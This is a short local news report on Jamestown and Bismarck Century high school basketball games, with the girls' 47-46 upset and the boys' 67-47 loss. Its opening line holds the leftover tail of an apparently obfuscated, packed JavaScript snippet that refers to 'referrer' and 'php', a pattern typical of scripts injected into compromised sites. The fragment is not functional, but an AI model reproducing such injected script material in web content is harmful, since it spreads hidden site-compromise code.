JAMESTOWN tetey|var|u0026u|referrer|zaens||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Jamestown girls had a opportunity to knock off No. 1 Century and almost let it slip away. After Macy Lynch hit a long two to pull Century within one, Jamestown in bounded the ball with the final seconds ticking off the clock. The Patriots stole the inbound and Jen Benz missed a short jumper right in front of the buzzer to preserve the Blue Jays upset.

It was a defensive slug-fest from two teams that know how it put it in the basket as Jamestown improved to 11-4 with the 47-46 win. Kyra Dewald, the WDA’s top-scorer, had just 13 for the Jays with nine of those coming from the free throw line.

Hannah Larson had 13 for Century while sophomore Jordyn Jossart had just five and left with 3:30 remaining with an injury.

It was the first WDA loss of the season for the Patriots who tied their lowest point total of the season (scored 46 in a win over Mandan) and are still the on top of the West Region.

For the Jamestown boys it was their ninth loss in a row as they dropped a 67-47 decision to Century. Logan Anderson had 15 for the Jays in the loss.

The Blue Jays currently would host the WDA play-in game if the season ended today, that game is scheduled for Saturday, March 2nd. Jamestown still had four regular season games left.

Jamestown travels to Bismarck on on Friday and then hosts Williston on Saturday. Both of those games will be broadcast on TED-FM 98.3/102.7 and online at NewsDakota.com.
